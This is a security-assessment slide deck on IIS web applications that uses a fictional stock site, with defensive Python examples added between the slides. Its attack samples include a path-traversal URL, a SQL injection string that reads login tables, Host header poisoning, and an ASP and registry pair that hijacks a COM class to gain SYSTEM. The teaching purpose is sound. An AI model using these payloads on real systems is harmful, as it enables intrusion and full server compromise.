Application Assessments on IIS

Welcome!
David Litchfield (d.litchfield@atstake.com)

What is an Application Assessment?
• Part of a network vulnerability assessment
• The application provides the site functionality
• The application is the least tested component, yet often proves to be the greatest risk
Vulnerability Scanners
• Cybercop
• I.S.S.
• Cerberus Internet Scanner
What scanners do
They highlight known vulnerabilities in COTS products:
• Webhits.dll and null.htw
• MSADC and RDS
• Ism.dll and the .htr overflow
• The %C0%AF UNICODE issue
What scanners don’t do They won’t assess your application
Assessing the Application
• What services does the site offer?
• What functionality exists to provide these services?
• What drives this functionality?
• How does it do this?
Stocks-r-us.com
• A free charting service of current/real-time market trends
• A subscriber service providing detailed market analysis
• An "I've forgotten my password" service
• A contact service
• An online service for applying for a job with stocks-r-us.com
Free charting service of current/real-time market trends
• From a web form a user chooses the stock market
• They also choose a time range
• On submitting, a page called read_img.asp returns a graph of the ups and downs of the market:
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
• The same page requested with the parameters left empty:
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
Exception Handling
The malformed request returns an ASP error:
ASP Error 800814: Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and .inc has not been mapped to asp.dll (so include files are served as plain text).
A search on Google reveals Olectra Chart.
Source code revelation!
• Olectra creates a virtual directory called /octemp
• When a graph or chart is produced, a temp directory is created under /octemp; its name is a number like "00000008"
• The dynamically produced graph is a random string of letters such as "AXYZPQ" with a file extension of .png
• So read_img.asp takes a directory name, a file name and an extension from the query string, and those parameters can be pointed at other files:
/read_img.asp?IDN=../&IFN=read_img&IFE=asp
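The read_img.asp weakness above is that three client-supplied parameters are joined into a file path with no validation. The following is an added example, not code from the talk or from Olectra, of how a server-side handler should treat such parameters: a positive check that each part has exactly the shape the application itself generates, followed by a canonical-path check that the result still lies under the chart root. The root directory /srv/octemp, the query-string format and the function names are assumptions for the example.

```python
import os
import re
from urllib.parse import parse_qs

# Constructed stand-in for the /octemp virtual directory root (an assumption for this example).
OCTEMP_ROOT = "/srv/octemp"

# The talk describes chart directories named like "00000008" and files like "AXYZPQ.png";
# these patterns accept exactly that shape and nothing else.
IDN_RE = re.compile(r"^[0-9]{8}$")
IFN_RE = re.compile(r"^[A-Z]{6}$")
ALLOWED_EXT = {"png"}


def is_within_root(root, candidate):
    """Canonicalise both paths and confirm candidate lives under root.

    os.path.commonpath is used instead of str.startswith so that a sibling
    directory such as /srv/octemp2 is not mistaken for /srv/octemp.
    """
    root_real = os.path.realpath(root)
    cand_real = os.path.realpath(candidate)
    return os.path.commonpath([root_real, cand_real]) == root_real


def check_request(query, root=OCTEMP_ROOT):
    """Validate a read_img-style query string.

    Returns ("allowed", canonical_path) or ("rejected", reason).
    """
    params = parse_qs(query, keep_blank_values=True)
    idn = params.get("IDN", [""])[0]
    ifn = params.get("IFN", [""])[0]
    ife = params.get("IFE", [""])[0]

    # Layer 1: positive validation. Each parameter must match the only shape
    # the application ever generates; "../", "read_img" and "asp" all fail here.
    if not IDN_RE.match(idn):
        return ("rejected", "IDN is not an 8-digit chart directory name")
    if not IFN_RE.match(ifn):
        return ("rejected", "IFN is not a generated chart file name")
    if ife not in ALLOWED_EXT:
        return ("rejected", "IFE is not an allowed image extension")

    # Layer 2: defence in depth. Even with validated parts, confirm the
    # canonical path stays inside the chart root before touching the file system.
    candidate = os.path.join(root, idn, ifn + "." + ife)
    if not is_within_root(root, candidate):
        return ("rejected", "resolved path escapes the chart directory")
    return ("allowed", os.path.realpath(candidate))


if __name__ == "__main__":
    for q in ("IDN=00000008&IFN=AXYZPQ&IFE=png",
              "IDN=&IFN=&IFE=",
              "IDN=../&IFN=read_img&IFE=asp"):
        print(q, "->", check_request(q))
```

The second layer matters even when the first looks airtight: if the naming scheme later changes, or the regular expressions are loosened, the canonical-path check still refuses anything outside /octemp.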
SQL Queries
  strSQL = "select price from stocks where name = '" _
           & request.querystring("company") & "'"
This code is insecure!!! Why?
By setting the "company" parameter to something such as:
  ISSX' select * from master..sysxlogins
the server would execute the two queries in batch mode:
  select price from stocks where name = 'ISSX'
  select * from master..sysxlogins
• The 'sa' login on MS SQL Server
• The xp_cmdshell extended stored procedure
On its own, ASP will not escape a single ' (quote mark); .idc files will.
Change all 's provided in a parameter to 0x27 or strip them out.
Consideration for integer input
  strSQL = "Select company from stocks where price > " & request.querystring("price")
Again we can insert an arbitrary SQL query here and have it execute; no quote mark is needed, because the numeric value is not quoted in the query.
Verifying numeric input
• IsNumeric() for VBScript
• isNaN() for JScript
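The two SQL slides describe the same defect twice: user input is concatenated into the query text, once inside a quoted string and once as a bare number. The following is an added example, not code from the talk, that reproduces both patterns against a constructed in-memory SQLite table and sets the hardened forms beside them: a parameterised query for the string case, and a strict numeric parse for the price case. The table contents, the row values and the function names are all constructed for the example; SQLite is used only because it runs anywhere, and it does not execute batched statements the way the SQL Server example on the slide does, so the tampered input here alters a single query rather than appending a second one.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the stocks table on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stocks (name TEXT, company TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO stocks VALUES (?, ?, ?)",
        [("ISSX", "Internet Security Systems", 62.5),
         ("MSFT", "Microsoft", 58.0),
         ("ORCL", "Oracle", 24.0)],
    )
    return conn


def price_by_name_unsafe(conn, company):
    """Same construction as the slide: a quote in the input closes the literal early."""
    sql = "select price from stocks where name = '" + company + "'"
    return [row[0] for row in conn.execute(sql)]


def price_by_name_safe(conn, company):
    """The driver sends the value separately; a quote in it is just a character."""
    return [row[0] for row in
            conn.execute("select price from stocks where name = ?", (company,))]


# A strict shape check for the price parameter. This is deliberately narrower than
# VBScript's IsNumeric(), which also accepts forms such as exponent notation;
# for a query parameter, plain digits with an optional decimal part are enough.
PRICE_RE = re.compile(r"^[0-9]+(\.[0-9]+)?$")


def parse_price(raw):
    """Accept only a plain decimal number; anything else is rejected before SQL is built."""
    if not PRICE_RE.match(raw):
        raise ValueError("price must be a plain decimal number")
    return float(raw)


def companies_above_price(conn, raw_price):
    """Hardened form of the second slide: validate first, then bind the value."""
    price = parse_price(raw_price)
    return [row[0] for row in
            conn.execute("select company from stocks where price > ? order by company",
                         (price,))]


if __name__ == "__main__":
    db = build_db()
    tampered = "ISSX' or name = 'MSFT"
    print("unsafe, tampered input:", price_by_name_unsafe(db, tampered))
    print("safe,   tampered input:", price_by_name_safe(db, tampered))
    print("companies above 50:", companies_above_price(db, "50"))
    try:
        companies_above_price(db, "50 or 1=1")
    except ValueError as e:
        print("rejected:", e)
```

The parameterised query is the real fix; the numeric check is what the "Verifying numeric input" slide calls for and protects the case where the value is never quoted at all. Escaping or stripping quote marks, as the earlier slide suggests, does nothing for that second case.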
r.f.p – Rain Forest Puppy http://www.wiretrip.net/rfp
Contact Service
  <%
  ..
  SMTPObj = GetObject("IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC")
  ..
  %>
HTTP SERVER_NAME Poisoning
SERVER_NAME is populated from the "Host:" HTTP client header field, so the client chooses the value that the ADSI path is built from. What that can lead to:
• Learn the password hash for the IWAM account
• Enumerate SQL servers
• Proxy attacks
• Samples on IIS
• ADSI, CORBA and COM
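The contact-service snippet trusts SERVER_NAME, which the client controls through the Host header. The following is an added example, not code from the talk, that shows the same construction beside a hardened version: the Host header is parsed from a raw request, checked against an allowlist of names the site actually answers to, and the ADSI path is then built from the server's own configured name rather than from the header. The site names, the request text and the function names are constructed for the example.

```python
import re

# Constructed configuration (an assumption for this example): the names this
# server legitimately answers to, and the single name used in ADSI paths.
CANONICAL_SERVER_NAME = "www.stocks-r-us.com"
ALLOWED_HOSTS = {"www.stocks-r-us.com", "stocks-r-us.com"}

# A Host value is a hostname with an optional port; anything else is malformed.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:[0-9]{1,5})?$")


def parse_host_header(raw_request):
    """Return the Host header value from a raw HTTP/1.x request, or None if absent."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:        # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip()
    return None


def adsi_path_unsafe(raw_request):
    """Mirrors the slide: the path is built from whatever the client sent as Host."""
    return "IIS://" + (parse_host_header(raw_request) or "") + "/SMTPSVC"


def adsi_path_safe(raw_request):
    """Validate Host against the allowlist, then use the server's configured name.

    The header is only ever used to decide whether to serve the request; the
    value that reaches GetObject() comes from server-side configuration.
    """
    host = parse_host_header(raw_request)
    if host is None or not HOST_RE.match(host):
        raise ValueError("missing or malformed Host header")
    hostname = host.split(":", 1)[0].lower()
    if hostname not in ALLOWED_HOSTS:
        raise ValueError("Host header does not name this site")
    return "IIS://" + CANONICAL_SERVER_NAME + "/SMTPSVC"


if __name__ == "__main__":
    # Constructed requests: one legitimate, one with a Host value the site does not own.
    good = "GET /contact.asp HTTP/1.1\r\nHost: www.stocks-r-us.com\r\n\r\n"
    bad = "GET /contact.asp HTTP/1.1\r\nHost: other-host.example\r\n\r\n"
    print("unsafe:", adsi_path_unsafe(bad))
    print("safe:  ", adsi_path_safe(good))
    try:
        adsi_path_safe(bad)
    except ValueError as e:
        print("rejected:", e)
```

The same rule covers every value IIS derives from the request, not only SERVER_NAME: a server variable that echoes a client header is client input and gets the same validation as a query-string parameter.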
On-line job application service
• As part of this service stocks-r-us.com allows uploading of CVs / résumés
• Client-side checking doesn't work
• Scripting is enabled on the /cvtemp virtual directory
Gaining SYSTEM Privileges using ASP
• IIS Security Model
• IUSR and IWAM accounts
Wscript.Shell Object
  WSObj = CreateObject("wscript.shell")
• Read from the Registry
• Write to the Registry
• Execute commands
MSI.ASP
  <%
  Dim WshShell, strCMD, strCMD2, result
  strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
  strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
  Set WshShell = Server.CreateObject("Wscript.Shell")
  On Error Resume Next
  result = WshShell.Run(strCMD)
  result = WshShell.Run(strCMD2)
  %>
MSI.REG
  REGEDIT4
  [HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
  @="c:\\inetpub\\wwwroot\\foo.dll"
  "ThreadingModel"="Both"
Summary
• Understand the technology you're dealing with
• Never trust user input, anywhere
• Ensure permissions are set properly
• Don't trust third-party software until it has been truly evaluated
• Don't rely on client-side checking
• Scanners won't find these problems; you will